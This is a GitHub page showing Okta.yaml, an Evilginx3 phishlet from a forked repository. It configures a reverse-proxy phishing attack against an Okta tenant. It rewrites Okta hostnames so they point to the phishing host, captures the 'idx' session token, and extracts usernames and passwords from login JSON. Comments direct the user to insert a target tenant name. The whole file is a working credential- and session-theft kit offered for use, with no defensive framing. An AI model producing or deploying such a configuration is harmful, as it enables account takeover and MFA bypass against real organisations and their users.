forked from simplerhacking/Evilginx3-Phishlets
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Okta.yaml
38 lines (30 loc) · 1.36 KB
/
Okta.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
min_ver: '3.0.0'
author: 'www.simplerhacking.com'
# List of proxy details. Okta tenant details needs to be added
proxy_hosts:
# 'okta-tenant-here' must be replaced by the actual Okta tenant name
- {phish_sub: 'okta-tenant-here', orig_sub: 'okta-tenant-here', domain: 'okta.com', session: true, is_landing: true, auto_filter: true}
# List of filters and their corresponding actions
sub_filters:
# Replace 'okta-tenant-here' with your actual Okta tenant name
- {triggers_on: 'okta-tenant-here', orig_sub: '', domain: 'okta-tenant-here', search: 'okta-tenant-here.okta.com', replace: '{hostname}', mimes: ['application/ion+json']}
- {triggers_on: 'okta-tenant-here', orig_sub: '', domain: 'okta-tenant-here', search: 'https.*\.okta\.com', replace: 'https://{hostname}', mimes: ['text/html']}
# Identification tokens for the Okta API, replace 'okta-tenant-here' with the Okta tenant
auth_tokens:
- domain: 'okta-tenant-here'
keys: ['idx']
# Capture the username and password during the phishing process
credentials:
username:
key: ''
search: '"identifier":"([^"]*)'
type: 'json'
password:
key: ''
search: '"passcode":"([^"]*)'
type: 'json'
# Specifies the login endpoint, replace 'okta-tenant-here' with the Okta tenant
login:
domain: 'okta-tenant-here'
path: '/login/login.htm'
# Ensure to replace 'okta-tenant-here' with the actual name of your Okta tenant.